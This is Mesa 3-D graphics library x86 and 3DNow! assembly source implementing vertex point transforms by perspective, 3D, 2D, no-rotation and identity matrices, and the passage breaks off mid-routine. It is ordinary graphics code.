 * _mesa_x86_transform_points2_perspective
 * Transform 2-component points by a perspective-projection matrix:
 *   dst[0] = x*m0 ; dst[1] = y*m5 ; dst[2] = m14 ; dst[3] = 0
 * m14 is hoisted into EBX before the loop and stored with an integer
 * MOV; dst[3] is the FP_ZERO bit pattern written the same way.
 * Sets dest size=4, flags |= VEC_SIZE_4, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (EBX/ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_perspective )
HIDDEN(_mesa_x86_transform_points2_perspective)
GLNAME( _mesa_x86_transform_points2_perspective ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_pr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
MOV_L( MAT14, EBX )
/* EBX holds the raw 32-bit pattern of m14, reused every iteration */
ALIGNTEXT16
LLBL(x86_p2_pr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FSTP_S( DST0 ) /* F1 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
MOV_L( CONST(FP_ZERO), DST3 )
LLBL(x86_p2_pr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_pr_loop) )
LLBL(x86_p2_pr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points2_3d
 * Transform 2-component points producing 3 output components:
 *   dst[i] = x*m[i] + y*m[4+i] + m[12+i]   for i = 0..2
 * Sets dest size=3, flags |= VEC_SIZE_3, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_3d )
HIDDEN(_mesa_x86_transform_points2_3d)
GLNAME( _mesa_x86_transform_points2_3d ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_3dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_3dr_loop):
/* six products (x*m0..m2, y*m4..m6) then pair-wise sums */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC1 ) /* F0 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT6 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
/* add translation m12..m14 and store the three results */
FXCH( ST(2) ) /* F4 F5 F6 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 F6 */
FADD_S( MAT13 )
FXCH( ST(2) ) /* F6 F4 F5 */
FADD_S( MAT14 )
FXCH( ST(1) ) /* F4 F6 F5 */
FSTP_S( DST0 ) /* F6 F5 */
FXCH( ST(1) ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
LLBL(x86_p2_3dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_3dr_loop) )
LLBL(x86_p2_3dr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points2_3d_no_rot
 * Transform 2-component points by a matrix with no rotational part:
 *   dst[0] = x*m0 + m12 ; dst[1] = y*m5 + m13 ; dst[2] = m14
 * m14 is hoisted into EBX and stored as a raw 32-bit pattern.
 * Sets dest size=3, flags |= VEC_SIZE_3, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (EBX/ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_3d_no_rot )
HIDDEN(_mesa_x86_transform_points2_3d_no_rot)
GLNAME( _mesa_x86_transform_points2_3d_no_rot ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_3dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
MOV_L( MAT14, EBX )
ALIGNTEXT16
LLBL(x86_p2_3dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 */
FXCH( ST(2) ) /* F1 F4 F5 */
FADDP( ST0, ST(2) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
LLBL(x86_p2_3dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_3dnrr_loop) )
LLBL(x86_p2_3dnrr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points2_2d
 * 2D transform of 2-component points (rotation/scale + translation):
 *   dst[0] = x*m0 + y*m4 + m12 ; dst[1] = x*m1 + y*m5 + m13
 * Sets dest size=2, flags |= VEC_SIZE_2, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_2d )
HIDDEN(_mesa_x86_transform_points2_2d)
GLNAME( _mesa_x86_transform_points2_2d ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_2dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_2dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC1 ) /* F0 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F5 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
FXCH( ST(1) ) /* F4 F5 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 */
FADD_S( MAT13 )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
LLBL(x86_p2_2dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_2dr_loop) )
LLBL(x86_p2_2dr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points2_2d_no_rot
 * 2D transform of 2-component points with no rotational part:
 *   dst[0] = x*m0 + m12 ; dst[1] = y*m5 + m13
 * Sets dest size=2, flags |= VEC_SIZE_2, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (ESI/EDI saved).
 * Fix: entry alignment was ALIGNTEXT4, inconsistent with every other
 * transform entry point in this file (all use ALIGNTEXT16).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_2d_no_rot )
HIDDEN(_mesa_x86_transform_points2_2d_no_rot)
GLNAME( _mesa_x86_transform_points2_2d_no_rot ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_2dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_2dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 */
FXCH( ST(2) ) /* F1 F4 F5 */
FADDP( ST0, ST(2) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
LLBL(x86_p2_2dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_2dnrr_loop) )
LLBL(x86_p2_2dnrr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points2_identity
 * Identity transform: copies the two source components to dest with
 * integer MOVs (no FP involved).  Skips the copy loop entirely when
 * source start == dest start (in-place no-op).
 * Sets dest size=2, flags |= VEC_SIZE_2, count = source count.
 * Clobbers: EAX, ECX, EDX (EBX/ESI/EDI saved).  Note EDX is reused as
 * scratch in the loop; the matrix pointer is loaded but never read.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_identity )
HIDDEN(_mesa_x86_transform_points2_identity)
GLNAME( _mesa_x86_transform_points2_identity ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_ir_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
CMP_L( ESI, EDI )
JE( LLBL(x86_p2_ir_done) )
ALIGNTEXT16
LLBL(x86_p2_ir_loop):
MOV_L( SRC0, EBX )
MOV_L( SRC1, EDX )
MOV_L( EBX, DST0 )
MOV_L( EDX, DST1 )
LLBL(x86_p2_ir_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_ir_loop) )
LLBL(x86_p2_ir_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 19,627
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform4.S
|
/* $Id: 3dnow_xform4.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_general
 * 3DNow! full 4x4 transform of 4-component points, two components at a
 * time in MMX registers:  r[i] = sum_j x[j]*m[4j+i].
 * Register roles: EAX=src ptr, EDX=dst ptr, ECX=matrix ptr,
 * ESI=remaining count, EDI=src stride.  Dst stride is 16 bytes.
 * Clobbers: MM0-MM7 (FEMMS on exit restores x87 state), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_general )
HIDDEN(_mesa_3dnow_transform_points4_general)
GLNAME( _mesa_3dnow_transform_points4_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_2 ) )
PREFETCHW ( REGIND(EDX) )
ALIGNTEXT16
LLBL( G3TPGR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM4 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
/* broadcast each source component into both halves of an MMX reg,
 * multiply by the matching matrix row pair, then sum the four
 * partial products into (r1|r0) and (r3|r2) */
MOVQ ( MM0, MM2 ) /* x1 | x0 */
MOVQ ( MM4, MM6 ) /* x3 | x2 */
PUNPCKLDQ ( MM0, MM0 ) /* x0 | x0 */
PUNPCKHDQ ( MM2, MM2 ) /* x1 | x1 */
MOVQ ( MM0, MM1 ) /* x0 | x0 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( REGIND(ECX), MM0 ) /* x0*m1 | x0*m0 */
MOVQ ( MM2, MM3 ) /* x1 | x1 */
PFMUL ( REGOFF(8, ECX), MM1 ) /* x0*m3 | x0*m2 */
PUNPCKLDQ ( MM4, MM4 ) /* x2 | x2 */
PFMUL ( REGOFF(16, ECX), MM2 ) /* x1*m5 | x1*m4 */
MOVQ ( MM4, MM5 ) /* x2 | x2 */
PFMUL ( REGOFF(24, ECX), MM3 ) /* x1*m7 | x1*m6 */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( REGOFF(32, ECX), MM4 ) /* x2*m9 | x2*m8 */
MOVQ ( MM6, MM7 ) /* x3 | x3 */
PFMUL ( REGOFF(40, ECX), MM5 ) /* x2*m11 | x2*m10 */
PFADD ( MM0, MM2 )
PFMUL ( REGOFF(48, ECX), MM6 ) /* x3*m13 | x3*m12 */
PFADD ( MM1, MM3 )
PFMUL ( REGOFF(56, ECX), MM7 ) /* x3*m15 | x3*m14 */
PFADD ( MM4, MM6 )
PFADD ( MM5, MM7 )
PFADD ( MM2, MM6 )
PFADD ( MM3, MM7 )
MOVQ ( MM6, REGOFF(-16, EDX) )
MOVQ ( MM7, REGOFF(-8, EDX) )
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_perspective
 * 3DNow! transform of 4-component points by a perspective matrix:
 *   r0 = x*m00 + z*m20 ; r1 = y*m11 + z*m21
 *   r2 = z*m22 + w*m32 ; r3 = -z
 * The needed matrix terms (m00|m11, m22|m32, m20|m21) are hoisted into
 * MM0-MM2 before the loop; MM7 is zeroed for the PFSUBR negation of z.
 * Clobbers: MM0-MM7 (FEMMS on exit), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_perspective )
HIDDEN(_mesa_3dnow_transform_points4_perspective)
GLNAME( _mesa_3dnow_transform_points4_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(40, ECX), MM1 ) /* | m22 */
PUNPCKLDQ ( REGOFF(56, ECX), MM1 ) /* m32 | m22 */
MOVQ ( REGOFF(32, ECX), MM2 ) /* m21 | m20 */
PXOR ( MM7, MM7 ) /* 0 | 0 */
ALIGNTEXT16
LLBL( G3TPPR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
MOVD ( REGOFF(8, EAX), MM3 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGOFF(32, EAX) ) /* hopefully stride is zero */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PUNPCKLDQ ( MM5, MM5 ) /* x2 | x2 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( MM2, MM5 ) /* x2*m21 | x2*m20 */
PFSUBR ( MM7, MM3 ) /* | -x2 */
PFMUL ( MM1, MM6 ) /* x3*m32 | x2*m22 */
PFADD ( MM4, MM5 ) /* x1*m11+x2*m21 | x0*m00+x2*m20 */
PFACC ( MM3, MM6 ) /* -x2 | x2*m22+x3*m32 */
MOVQ ( MM5, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM6, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_3d
 * 3DNow! transform of 4-component points by a 3D matrix (last matrix
 * column assumed 0,0,0,1):
 *   r[i] = x*m[i] + y*m[4+i] + z*m[8+i] + w*m[12+i]  for i = 0..2
 *   r3   = source w (accumulated in via the final PFACC)
 * MM6/MM7 hold the hoisted pairs (m6|m2) and (m14|m10).
 * Clobbers: MM0-MM7 (FEMMS on exit), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_3d )
HIDDEN(_mesa_3dnow_transform_points4_3d)
GLNAME( _mesa_3dnow_transform_points4_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_2 ) )
MOVD ( REGOFF(8, ECX), MM6 ) /* | m2 */
PUNPCKLDQ ( REGOFF(24, ECX), MM6 ) /* m6 | m2 */
MOVD ( REGOFF(40, ECX), MM7 ) /* | m10 */
PUNPCKLDQ ( REGOFF(56, ECX), MM7 ) /* m14 | m10 */
ALIGNTEXT16
LLBL( G3TP3R_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
PREFETCH ( REGOFF(32, EAX) ) /* hopefully array is tightly packed */
MOVQ ( REGIND(EAX), MM2 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM3 ) /* x3 | x2 */
MOVQ ( MM2, MM0 ) /* x1 | x0 */
MOVQ ( MM3, MM4 ) /* x3 | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
MOVQ ( MM4, MM5 ) /* x3 | x2 */
PUNPCKLDQ ( MM0, MM0 ) /* x0 | x0 */
PUNPCKHDQ ( MM1, MM1 ) /* x1 | x1 */
PFMUL ( REGIND(ECX), MM0 ) /* x0*m1 | x0*m0 */
PUNPCKLDQ ( MM3, MM3 ) /* x2 | x2 */
PFMUL ( REGOFF(16, ECX), MM1 ) /* x1*m5 | x1*m4 */
PUNPCKHDQ ( MM4, MM4 ) /* x3 | x3 */
PFMUL ( MM6, MM2 ) /* x1*m6 | x0*m2 */
PFADD ( MM0, MM1 ) /* x0*m1+x1*m5 | x0*m0+x1*m4 */
PFMUL ( REGOFF(32, ECX), MM3 ) /* x2*m9 | x2*m8 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( REGOFF(48, ECX), MM4 ) /* x3*m13 | x3*m12 */
PFADD ( MM1, MM3 ) /* x0*m1+..+x2*m9 | x0*m0+...+x2*m8 */
PFMUL ( MM7, MM5 ) /* x3*m14 | x2*m10 */
PFADD ( MM3, MM4 ) /* r1 | r0 */
PFACC ( MM2, MM5 ) /* x0*m2+x1*m6 | x2*m10+x3*m14 */
MOVD ( REGOFF(12, EAX), MM0 ) /* | x3 */
ADD_L ( EDI, EAX ) /* next vertex */
/* final PFACC folds r2's partial sums and deposits x3 (w) into r3 */
PFACC ( MM0, MM5 ) /* r3 | r2 */
MOVQ ( MM4, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_3d_no_rot
 * 3DNow! transform of 4-component points, no rotational part:
 *   r0 = x*m00 + w*m30 ; r1 = y*m11 + w*m31
 *   r2 = z*m22 + w*m32 ; r3 = w
 * Hoisted terms: MM0 = m11|m00, MM2 = m32|m22, MM1 = m31|m30.
 * Clobbers: MM0-MM2, MM4-MM7 (FEMMS on exit), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points4_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points4_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_2 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m22 */
PUNPCKLDQ ( REGOFF(56, ECX), MM2 ) /* m32 | m22 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP3NRR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
MOVD ( REGOFF(12, EAX), MM7 ) /* | x3 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGOFF(32, EAX) ) /* hopefully stride is zero */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( MM2, MM5 ) /* x3*m32 | x2*m22 */
PFMUL ( MM1, MM6 ) /* x3*m31 | x3*m30 */
/* PFACC folds r2 and deposits x3 (w) into r3 */
PFACC ( MM7, MM5 ) /* x3 | x2*m22+x3*m32 */
